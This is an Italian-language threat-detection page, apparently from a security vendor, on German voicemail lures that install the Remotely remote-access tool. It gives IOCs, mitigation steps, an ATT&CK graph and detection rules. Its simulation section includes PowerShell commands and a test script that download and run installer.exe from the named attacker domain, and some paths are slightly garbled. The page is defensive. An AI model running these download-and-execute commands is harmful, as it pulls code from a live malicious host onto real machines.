Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Gli attori delle minacce stanno ospitando pagine di destinazione “voicemail” in lingua tedesca che invitano gli utenti a scaricare un file BAT. Lo script riproduce un audio di esca innocuo mentre installa silenziosamente il legittimo strumento di monitoraggio remoto Remotely. Una volta distribuito, l’agente RMM fornisce all’attaccante l’accesso remoto persistente tramite infrastruttura C2 controllata dall’attaccante.
Indagine
Censys ha identificato 86 proprietĂ web compromesse su domini *.cadillac.ps che distribuiscono il BAT dannoso. Lo script invoca un installer PowerShell ospitato su remotely.billbutterworth.com, che scarica un pacchetto ZIP di Remotely. L’archivio contiene i componenti agenti di Remotely e un servizio che si installa sotto C:Program FilesRemotely.
Mitigazione
Bloccare i domini *.cadillac.ps e remotely.billbutterworth.com a livello di DNS/proxy. Istruire gli utenti a non eseguire file BAT inaspettati o copiare/incollare comandi PowerShell da pagine web sconosciute. Distribuire controlli endpoint per rilevare la creazione di servizi Remotely e percorsi di installazione sospetti o strumenti non firmati.
Risposta
Allertare sulla creazione di Remotely_Service e sulla presenza di Remotely_Agent.exe sotto Program Files. Cacciare voicemail.bat e l’attivitĂ dell’installer PowerShell associata. Isolare gli host compromessi, raccogliere artefatti forensi e ruotare/revocare qualsiasi credenziale o token utilizzato dall’agente RMM.
graph TB %% Definizioni delle classi classDef action fill:#99ccff %% Nodi node_content_injection[“<b>Tecnica</b> – T1659 Iniezione di Contenuto<br/>ProprietĂ web compromessa distribuisce un link dannoso.”] class node_content_injection action node_initial_user_exec[“<b>Tecnica</b> – T1204.001 Esecuzione da Parte dell’Utente: Link Dannoso<br/>La vittima fa clic su un link dannoso verso una pagina di segreteria compromessa.”] class node_initial_user_exec action node_cmd_shell[“<b>Tecnica</b> – T1059.003 Shell dei Comandi di Windows<br/>File BAT (voicemail.bat) scaricato ed eseguito.”] class node_cmd_shell action node_powershell[“<b>Tecnica</b> – T1059.001 PowerShell<br/>Lo script Install-Remotely.ps1 installa Remotely RMM.”] class node_powershell action node_system_service[“<b>Tecnica</b> – T1569 Servizi di Sistema<br/>RMM installato come servizio Windows (Remotely_Service).”] class node_system_service action node_masquerading[“<b>Tecnica</b> – T1036 Mascheramento & T1036.008 Mascheramento del Tipo di File<br/>BAT presentato come aggiornamento multimediale; file collocati in Program Files.”] class node_masquerading action node_hide_artifacts[“<b>Tecnica</b> – T1564 Nascondere Artefatti<br/>Artefatti di installazione nascosti in C:\Program Files\Remotely.”] class node_hide_artifacts action node_c2[“<b>Tecnica</b> – T1102.002 Comunicazione Bidirezionale tramite Servizio Web & T1071 Protocollo di Livello Applicazione<br/>Comunicazione HTTPS con server remoto.”] class node_c2 action %% Connessioni node_content_injection –>|supporta| node_initial_user_exec node_initial_user_exec –>|porta_a| node_cmd_shell node_cmd_shell –>|esegue| node_powershell node_powershell –>|installa| node_system_service node_system_service –>|usa| node_masquerading node_system_service –>|usa| node_hide_artifacts node_system_service –>|stabilisce| node_c2
Flusso di Attacco
Rilevamenti
Scaricare o Caricare tramite Powershell (via cmdline)
Visualizza
Interferenza Sospetta Ransomware con Interruzione del Servizio (via cmdline)
Visualizza
Powershell Esegue File in Directory Sospetta Utilizzando Politica di Esecuzione Bypass (via cmdline)
Visualizza
IOC (HashSha256) per rilevare: Trappola di Messaggio Vocale: Esche di Messaggio Vocale in Lingua Tedesca portano ad Accesso Remoto
Visualizza
IOC (HashMd5) per rilevare: Trappola di Messaggio Vocale: Esche di Messaggio Vocale in Lingua Tedesca portano ad Accesso Remoto
Visualizza
Esche di Messaggio Vocale in Tedesco che Portano all’Installazione di RMM [Server Web]
Visualizza
Rilevamento Esecuzione File BAT di Messaggio Vocale [Evento File di Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-VolontĂ di Telemetria e Baseline deve essere stato superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per innescare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente le TTP identificate e mirano a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrazione d’Attacco e Comandi:
- Consegna di Phishing: L’attaccante invia un’email con un’esca vocale in lingua tedesca allegata (HTML) che, quando aperta, reindirizza la vittima a
http://bannerbank.cadillac.ps/voicemail.html. - Esecuzione della Pagina di Atterraggio: La pagina di atterraggio ospita un one-liner PowerShell dannoso che scarica ed esegue un installer di strumento di gestione remota (RMM).
- Creazione di Processo: Quando il browser della vittima processa la pagina, viene invocato PowerShell con una riga di comando che esplicitamente include le due stringhe ricercate dalla regola.
- Telemetria Risultante: Windows registra l’evento ID 4688 con una
CommandLinecontenente entrambe “pagina di atterraggio a tema messaggio vocale” and “bannerbank.cadillac.ps”, soddisfacendo così la condizione Sigma.
Il comando esatto usato per la simulazione:
# Esecuzione malevola simulata – contiene entrambe le stringhe di innesco Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-themed landing page'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - Consegna di Phishing: L’attaccante invia un’email con un’esca vocale in lingua tedesca allegata (HTML) che, quando aperta, reindirizza la vittima a
-
Script di Test di Regressione: Uno script PowerShell auto-contenuto che riproduce l’attacco e può essere eseguito su qualsiasi host Windows con la registrazione richiesta abilitata.
<# .SYNOPSIS Simula l'esca di messaggio vocale in tedesco che innesca la regola di rilevamento Sigma. .DESCRIPTION Esegue una riga di comando PowerShell contenente entrambe le sottostringhe richieste. #> # Definire stringhe malevole $lureText = "pagina di atterraggio a tema messaggio vocale" $maliciousDomain = "bannerbank.cadillac.ps" # Costruire il one-liner che apparirĂ nella riga di comando $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Avvia PowerShell con la riga di comando creata $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Lancio del comando PowerShell malevolo..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Opzionale: attendere qualche secondo per garantire la registrazione Start-Sleep -Seconds 5 -
Comandi di Pulizia: Rimuovere l’installer scaricato e qualsiasi processo residuo.
# Arresta qualsiasi processo di installer rimanente Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Elimina il file installer temporaneo $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Pulito $installerPath" }